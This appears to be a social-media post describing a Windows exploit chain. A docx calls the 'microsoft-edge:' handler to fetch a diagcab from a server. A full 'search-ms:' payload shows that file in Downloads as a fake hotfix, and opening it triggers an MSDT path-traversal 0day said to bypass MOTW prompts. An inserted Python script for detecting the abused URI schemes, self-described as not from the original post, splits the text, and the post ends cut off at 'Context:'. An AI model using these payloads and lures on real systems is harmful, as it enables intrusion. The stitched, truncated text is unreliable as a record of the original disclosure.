microsoft-edge + ms-search + MSDT path traversal 0day = 2-click fun (one additional click due to Protected View if the docx comes from a remote location, btw).
This is the full chain:
1) Open a docx that connects to a remote server to download a diagcab file via MS Edge. This uses the protocol handler "microsoft-edge". As easy as this: "microsoft-edge:http://127.0.0.1:8081/foo.html"
2) Use the "ms-search" trick to open the Downloads folder.
Note: I don't know the username, but I'm using what MS calls "Constants for Common Folders": location:shell%3aDownloads.
Full payload is: "search-ms:query=KB5002076-hotfix.diagcab&crumb=location:shell%3aDownloads&displayname=Important%20update"
3) Double-click the file "KB5002076-hotfix.diagcab" to exploit that path traversal 0day in MSDT.
Bonuses:
1) It's not needed to use a remote location for "ms-search". We can use the Downloads folder.
2) As the downloaded file is a diagcab, there's no prompt to open an executable from a remote location. And it bypasses the MOTW prompt.
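Since the chain starts from protocol-handler URIs embedded in a docx, a defender can scan incoming documents for external relationship targets using the "microsoft-edge:" and "search-ms:" schemes named above. This is an added detection example, not code from the original post; the scheme list, the helper names and the constructed sample document are my own assumptions.

```python
import io
import re
import zipfile
from xml.sax.saxutils import escape, unescape

# URI schemes abused by the chain described above (assumption: a defender
# would also watch the "ms-msdt:" handler, since MSDT is the final target).
SUSPICIOUS_SCHEMES = ("microsoft-edge:", "search-ms:", "ms-msdt:")

# Matches the Target attribute of OOXML <Relationship> elements.
TARGET_RE = re.compile(r'Target="([^"]*)"', re.IGNORECASE)


def find_suspicious_links(docx_bytes):
    """Return [(part_name, target)] for every relationship target inside the
    docx (a zip container) whose scheme is in SUSPICIOUS_SCHEMES."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            for raw in TARGET_RE.findall(text):
                target = unescape(raw)  # XML attribute: &amp; -> &
                if target.lower().startswith(SUSPICIOUS_SCHEMES):
                    hits.append((name, target))
    return hits


def build_sample_docx(targets):
    """Construct a minimal docx-like zip carrying the given external hyperlink
    targets. Constructed test input only, not a real Word document."""
    rels = ['<?xml version="1.0" encoding="UTF-8"?>',
            '<Relationships xmlns="http://schemas.openxmlformats.org/'
            'package/2006/relationships">']
    for i, t in enumerate(targets):
        rels.append('<Relationship Id="rId%d" Type="http://schemas.openxml'
                    'formats.org/officeDocument/2006/relationships/hyperlink" '
                    'Target="%s" TargetMode="External"/>' % (i, escape(t)))
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", "\n".join(rels))
    return buf.getvalue()
```

Run it over real documents by passing the file bytes to find_suspicious_links; an empty list means no relationship target used one of the listed schemes.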
For people who wonder if this is related to #Follina. It's another 0day. Context: